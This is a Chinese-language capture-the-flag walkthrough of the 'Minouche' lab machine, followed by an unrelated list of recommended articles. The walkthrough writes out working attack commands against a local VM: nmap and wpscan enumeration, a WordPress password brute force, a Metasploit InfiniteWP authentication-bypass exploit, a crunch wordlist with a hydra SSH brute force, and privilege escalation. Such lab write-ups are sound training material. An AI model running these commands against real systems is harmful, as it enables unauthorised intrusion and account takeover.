靶机准备

先将靶机导入虚拟机,并将网络模式改为NAT



扫描不到ip,改VirtualBox,使用桥接,并将kali也改为桥接模式



扫描ip:192.168.0.102

netdiscover -r 192.168.0.0/24192.168.0.0/24



kali:192.168.0.105

渗透测试

扫描端口

nmap -sS -sV -T5 -A -p- 192.168.0.102



开放了3个端口

查看80端口



发现是wordpress的CMS框架

再用dirb扫描,确认一下



用wpscan扫描,枚举用户

wpscan --url http://192.168.0.102 -e u,p

扫描到一个用户:kitty



尝试爆破密码

wpscan --url http://192.168.0.102 -U kitty -P /usr/share/wordlists/rockyou.txt



半天爆不出来,尝试从插件入手,用此工具扫描其插件

wpscan --url http://192.168.0.102 -e u,p --plugins-detection mixed

扫描到插件iwp-client



发现有漏洞:



使用msf搜索此漏洞进行利用

search InfiniteWP
use exploit/unix/webapp/wp_infinitewp_auth_bypass
set lhost 192.168.0.105
set rhosts 192.168.0.102
set username kitty
exploit



成功拿到shell

挖掘信息

一直退到根目录下发现有一个kitty.txt文件,cat查看



有个提示,你的密码使用美元符+猫的名字+你出生的年份不是一个好密码

用kali下自带的crunch根据提示生成字典

命令:

crunch 13 13 -t "$"Minouche19%% -o 1.txt
crunch 13 13 -t "$"Minouche20%% -o 2.txt



用hydra爆破一波

hydra -l kitty -P 2.txt ssh://192.168.0.102

爆破出密码



利用得到的密码,登录



在目录下发现user.txt,cat查看



发现还有一个压缩包:android.zip

拷贝下来解压

scp kitty@192.168.0.102:~/android.zip /root



解压完以后多了一个data里面有很多数据



搜索数据库发现一个数据库里面有东西

find . -name *.db



打开数据库工具在里面发现有一长串数据



尝试用这串数据提权



提权成功

获取root目录下的数据

minouche的更多相关文章

随机推荐

  1. 框架3.2--搭建V·P·N

    目录 部署OpenVPN 一.服务端 1.安装openvpn和证书工具 2.生成服务器配置文件 3.准备证书签发相关文件 4.准备签发证书相关变量的配置文件 5.初始化PKI生成PKI相关目录和文件 ...

  2. 自学linux(常用命令)STEP3

    tty tty 可以查看当前处于哪一个系统中. 比如我在图形化界面输入 tty: alt+ctrl+F3切换到命令行: linux命令 linux命令,一般都是 命令+选项+参数,这种格式,为了防止选 ...

  3. kubeasz 部署高可用 kubernetes 集群

    文章目录 环境准备 配置模板机 配置hosts解析 配置ssh 免密钥登陆 kubeasz 部署服务准备 配置主机清单 部署集群 环境准备 IP HOSTNAME SYSTEM 192.168.131 ...

  4. Python基础—名称空间(Day10)

    一.名称空间和作用域 1.全局名称空间(名称空间.命名空间): py文件运行时代码从上之下依次执行,看到一个变量就会将这个变量与对应值的内存地址的关系存到名称空间里,代码要运行时(print时)从名称 ...

  5. Remix本地化,加载本地合约文件,本地链接Remix

    智能合约IDE,在线的比较卡,而且切换网络面临文件丢失的风险,选择本地搭建Solidity本地编辑环境,Remix-IDE + Remixd组合,加载本地合约代码.这里用到两个工具: Remix ID ...

  6. python数据结构:数组和列表

    线性结构有两种:数组和列表 array和list 其中list各项操作的时间复杂度如下 因为insert是在头部插入 所以列表所有元素后移,时间复杂度为O(n) remove移除列表中某个值的第一个匹 ...

  7. REACT 使用antd Table 中rowSelection遇到的问题

    首先项目是尚硅谷的后台谷粒平台,在用到antd Table 中的 rowSelection时,出现了一个问题(P87时遇到的问题): 表格中的每一项前面有一个radio单选框可以选中,本来是想利用ro ...

  8. SaccadeNet:使用角点特征进行two-stage预测框精调 | CVPR 2020

    SaccadeNet基于中心点特征进行初步的目标定位,然后利用初步预测框的角点特征以及中心点特征进行预测框的精调,整体思想类似于two-stage目标检测算法,将第二阶段的预测框精调用的区域特征转化为 ...

  9. 关于GDPR的六大理解

    通用数据保护条例(GDPR)于2018年5月生效,根据法律条文,英国几乎所有企业都需要遵守该规定.然而,人们对法规本身及其对组织的意义仍存在一些误解.这可能会导致一些错误的决定. 通用数据保护条例(G ...

  10. Neo4j入门日志(一)导入数据

    本文主要来源于: neo4j的官方文档 使用的是neo4j官方提供的导入方式,即使用import,在cmd中进行导入. 1.导入的基本方式 bin/neo4j-admin import --datab ...